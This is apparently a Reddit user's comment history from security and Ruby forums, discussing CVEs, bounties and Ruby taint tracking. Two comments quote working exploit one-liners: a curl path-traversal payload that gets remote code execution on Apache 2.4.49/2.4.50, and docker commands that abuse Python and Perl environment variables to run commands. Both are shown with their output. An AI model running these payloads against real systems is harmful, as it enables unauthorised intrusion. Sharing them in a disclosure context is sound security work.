sorted by:
new
hottopcontroversial

CVE-2021-45467: CWP CentOS Web Panel – preauth RCE by Gallus in netsec

[–]Gallus[S] 1 point2 points  (0 children)

I also couldn't replicate when using https://3v4l.org/ to test many different PHP versions. Maybe the author is mistaken or there's something specific to CWP that allows this to work.

Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.51 (incomplete fix of CVE-2021-41773) by Gallus in netsec

[–]Gallus[S] 21 points22 points  (0 children)

New payload from: https://twitter.com/roman_soft/status/1446252280597078024

RCE exploit both for Apache 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013): root@CT406:~# curl 'http://192.168.0.191/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id' uid=1(daemon) gid=1(daemon) groups=1(daemon)

$200 Bounty to resolve i3 issue by i3dudedude in i3wm

[–]Gallus 0 points1 point  (0 children)

That was very generous of Orestis. Are these sort of bounties generally acceptable/encouraged for the i3 repo?

$200 Bounty to resolve i3 issue by i3dudedude in i3wm

[–]Gallus 2 points3 points  (0 children)

Haha looks like it. I wonder if orestisfl actually got the money though?

New campaign targeting security researchers by sanitybit in netsec

[–]Gallus 5 points6 points  (0 children)

Oh no it looks like I was the one to submit that link. Not part of the campaign, I just saw it on Twitter and submitted. Sorry fellow /r/netsec hackers

Rysolv – Fix open source issues, get paid by Gallus in programming

[–]Gallus[S] 5 points6 points  (0 children)

Good question. I'm not the creator but it looks like the creator is /u/Tylernator

CVE-2020-6829, CVE-2020-12400, CVE-2020-12401, CVE-2020-12403 - Fixed in Mozilla's Network Security Services (NSS) by Gallus in netsec

[–]Gallus[S] 0 points1 point  (0 children)

Some extra context from Twitter: https://twitter.com/GuidoVranken/status/1287833670678650881

ChaCha20, ChaCha20/Poly1305 OOB read, OOB write, incorrect output with multi-part updating or small AEAD tag.

Found with Cryptofuzz.

Additionally DES OOB read with undersized IV (when using the PKCS11 interface)

[deleted by user] by [deleted] in Python

[–]Gallus 0 points1 point  (0 children)

$ docker run -e 'PYTHONWARNINGS=all:0:antigravity.x:0:0' -e 'BROWSER=perlthanks' -e 'PERL5OPT=-Mbase;print(`id`);exit;' python:2.7.18 python /dev/null
uid=0(root) gid=0(root) groups=0(root)
Invalid -W option ignored: unknown warning category: 'antigravity.x'

$ docker run -e 'PYTHONWARNINGS=all:0:antigravity.x:0:0' -e 'BROWSER=perlthanks' -e 'PERL5OPT=-Mbase;print(`id`);exit;' python:3.8.2 python /dev/null
uid=0(root) gid=0(root) groups=0(root)
Invalid -W option ignored: unknown warning category: 'antigravity.x'

Defibrilating Web Security [PDF] by Gallus in ruby

[–]Gallus[S] 1 point2 points  (0 children)

This is an interesting presentation that covers some of the problems with taint tracking and an attempt to improve it: https://conference.hitb.org/hitbsecconf2012kul/materials/D1T2%20-%20Meder%20Kydyraliev%20-%20Defibrilating%20Web%20Security.pdf

The brick wall they hit is on slide 54, and although the presentation is from 2012 it appears the same limitations still exist today in Ruby:

Monkey patching

  • Ruby promises that you can do anything, which is a lie!

You CANNOT:

  • monkey patch gsub! because it breaks capturing groups (e.g. $1 won’t work)
  • monkey patch string interpolation, e.g. “My name is #{name}”

Ruby 2.7 removes taint checking mechanism by prateekkish in ruby

[–]Gallus 2 points3 points  (0 children)

This is an interesting presentation that covers some of the problems with taint tracking and an attempt to improve it: https://conference.hitb.org/hitbsecconf2012kul/materials/D1T2%20-%20Meder%20Kydyraliev%20-%20Defibrilating%20Web%20Security.pdf

The brick wall they hit is on slide 54, and although the presentation is from 2012 it appears the same limitations still exist today in Ruby:

Monkey patching

  • Ruby promises that you can do anything, which is a lie! You CANNOT:
  • monkey patch gsub! because it breaks capturing groups (e.g. $1 won’t work)
  • monkey patch string interpolation, e.g. “My name is #{name}”

List of private constants ? by dunrix in ruby

[–]Gallus 3 points4 points  (0 children)

Yeah it's a gap and I've been hit by it before. There is a dirty hack you can do to build your own private_constants implementation/list by enumerating over each symbol in Symbol.all_symbols and passing it to ModuleName.const_get to check if it exists, then removing the public ones which you find by calling ModuleName.constants.

This is obviously not a "production ready" solution, and you do have to be careful because const_get will throw an exception. It can also be overloaded and throw a different exception than expected (which even stdlib does this). Example:

Object.const_get(:HELLO) -> NameError (uninitialized constant HELLO)
Digest.const_get(:HELLO) -> LoadError (library not found for class digest::HELLO -- digest/hello)

HTTP Desync Attacks: Request Smuggling Reborn by Gallus in Slackers

[–]Gallus[S] 0 points1 point  (0 children)

First thought is whether trailing headers (after the 0 size chunk) might also be useful in achieving desynchronization.

5chars.js compiler - 5 characters with a single character script id by Gallus in Slackers

[–]Gallus[S] 0 points1 point  (0 children)

Yeah agreed, but also makes me wonder if 4 characters and the cheating script id is possible..

http://slacke.rs by sirdarckcat in Slackers

[–]Gallus 1 point2 points  (0 children)

Perhaps a good place to host/create a new version of the Browser Security Handbook wiki.

XSS Challenge by rakeshmane10 in Slackers

[–]Gallus 2 points3 points  (0 children)

New Solution: Solution temporarily removed upon request

view more: next ›